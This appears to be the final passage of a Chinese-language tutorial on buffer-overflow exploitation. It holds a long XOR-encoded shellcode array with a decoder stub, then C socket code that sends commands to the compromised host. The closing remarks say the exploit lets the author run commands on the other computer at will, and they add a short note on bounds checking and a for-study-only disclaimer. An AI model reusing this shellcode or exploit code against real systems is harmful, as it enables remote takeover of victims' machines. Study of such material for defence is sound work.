"\x66\xB9\x79\x02" "\x8A\x04\x0E\x34\x17\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x17\xFF\xE6" \ "\x94\xFB\x47\x42\x9C\xFB\x94\xFB\x07\xFC\x37\x74\x7A\x73\x39\x72"\ "\x6F\x72\x17\x60\x64\x25\x48\x24\x25\x39\x73\x7B\x7B\x17\x7C\x72"\ "\x65\x79\x72\x7B\x24\x25\x39\x73\x7B\x7B\x17\xFF\x17\x17\x17\x17"\ "\x4C\x9E\x4A\xEB\x73\x9C\x22\x27\x17\x17\x17\x9C\x61\x1B\x9C\x61"\ "\x0B\x9C\x21\x9C\x41\x1F\x45\x7F\x90\x25\xCF\xD7\xFF\x29\x17\x17"\ "\x17\x9C\xEF\x9A\x64\xF9\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xEF"\ "\x9A\x64\xF4\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xE3\xE8\x62\xE3"\ "\xE8\x62\xEF\xE8\x62\xEB\xFF\xDA\x17\x17\x17\xE8\x62\xEF\x7F\x74"\ 
"\x9E\xC6\x58\xFF\x10\x17\x17\x17\x7D\x17\xE8\xC7\x9C\xF2\x4A\x42"\ "\x9C\xFB\x94\xFB\x1B\x45\x9C\x5A\x1B\x9C\x56\x2B\x9C\x53\x1F\x6F"\ "\x9C\x6B\x1F\x0B\x14\xEE\x9E\x6A\xEB\x9C\x6B\x1F\x37\x14\xEE\x9E"\ "\x6A\xEF\x9C\x6B\x1F\x33\x14\xEE\x9E\x6A\xE3\x9C\x6B\x1F\x0F\x24"\ "\xDE\xFC\x16\x56\x9C\x62\xEF\x9C\x23\x99\x9C\x42\x1B\x9A\x23\x25"\ "\xE8\x62\x1F\x41\xFF\x36\x17\x17\x17\x94\xEF\x16\x62\xF2\x9C\x62"\ "\xE3\x24\xE8\x71\x9C\x2B\x59\x9C\x42\xEB\x9C\x23\xAD\x9C\x42\x1B"\ "\x9A\x13\x25\x4D\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x94\xFB\x13"\ "\xD0\x52\xEB\x17\x17\x17\x17\x44\x46\x45\x9C\x62\x1F\x24\xDE\x24"\ "\xD7\x9D\x13\x19\x93\xD7\x63\x01\x9C\x4A\xEB\xD6\xF4\x0E\x9C\x42"\ "\xEB\xD6\xFD\x10\x1C\xCD\x14\xCF\x9E\x4A\xEB\x56\xFC\xF4\x9C\x4A"\ "\x1B\x9C\x42\xEB\x24\xD7\x2C\xCD\x62\x12\xAF\x16\x17\x17\x17\x4D"\ "\x4E\x4C\x9C\xF2\x4A\xD5\x1F\x17\x42\x9C\xFB\x96\xFB\x17\x14\x17"\ "\x17\xE8\x62\x07\x7F\x2A\x7D\xA3\x97\xFF\x26\xE8\xE8\xE8\x9A\xA2"\ "\x17\xEA\xE8\xE8\x41\x7F\x15\x15\x17\x17\xE8\xC7\x92\xD7\x18\x92"\ "\x17\x16\x17\x17\xE8\x62\x07\x7F\x3A\x25\x6F\xC9\xFF\x19\xE8\xE8"\ "\xE8\x7D\x17\x7D\x17\x7D\x17\x7D\x11\x7D\x16\x7D\x15\xE8\xC7\x9E"\ "\x52\xEB\xE8\x62\x07\x7F\x73\x07\xB0\xCA\xFF\xE7\xE9\xE8\xE8\x71"\ "\xD0\x92\x17\xE9\xE8\xE8\x15\x17\x71\xD0\x92\x15\xE9\xE8\xE8\x12"\ "\xFC\xD0\x92\x13\xE9\xE8\xE8\x17\x17\x17\x17\x9A\xA2\x17\xE9\xE8"\ "\xE8\x7D\x03\x41\xE8\x62\xEB\xE8\xC7\x92\xD7\x18\x92\xB4\x17\x17"\ "\x17\xE8\x62\x07\x7F\x1B\x88\xC4\x5C\xFF\xA6\xE9\xE8\xE8\x7F\xE8"\ "\xE8\xE8\x68\xE8\x62\xEB\xE8\xC7\x94\xEF\x17\x18\x92\x94\x17\x17"\ "\x17\xE8\x62\x07\x7F\xA6\x09\x80\x16\xFF\x86\xE9\xE8\xE8\x7D\x17"\ "\x7D\x17\xE8\x62\xEB\xE8\xC7\x9E\x52\xEB\xE8\x62\x1B\x7F\xDE\xAB"\ "\xB1\x7C\xFF\x6F\xE9\xE8\xE8\x9C\xC7\x9A\xAA\x67\xE8\xE8\xE8\xAE"\ "\x06\x17\x17\x17\xAF\x17\x17\x17\x17\xEB\xE4\xBC\xD0\x92\x67\xE8"\ "\xE8\xE8\x53\x17\x17\x17\xD0\x52\x8B\x16\x16\x17\x17\x71\xD0\x52"\ "\xB7\x17\x17\x9C\x62\xEB\x9E\x62\xBF\x9E\x62\xBB\x9E\x62\xA7\x9A"\ 
"\xA2\x67\xE8\xE8\xE8\x9A\xAA\x17\xE9\xE8\xE8\x9C\x4A\x1F\x9A\x4C"\ "\xCC\x40\x41\x7D\x17\x7D\x17\x7D\x17\x7D\x16\x7D\x17\x7D\x17\x44"\ "\x7D\x17\xE8\xC5\x9C\xF2\x4A\xD5\x1B\x17"; recv(stListen, szRecv, sizeof(szRecv), 0); send(stListen, pCompand, strlen(pCompand), 0); // 6.接收信息 recv(stListen, szRecv, sizeof(szRecv), 0); // 7.清理环境 closesocket(stListen); WSACleanup(); return 0; }
5.结语
1)最后执行结果如下,可以按自己的意愿控制对方电脑执行命令(如创建一个helloworld文件夹)
2)缓冲区溢出一般是没有进行边界检查,或使用了不安全的函数,避免这个情况能大大提高安全性。
3)想要完成漏洞分析,对于出现漏洞的设备或项目有所了解才能顺利完成任务。
4)热爱国家,遵纪守法,仅用于学习,请勿作恶
5)本文记录平日自己写的项目(其中用到的知识来自于15pb,遇到不解处多谢老师指导)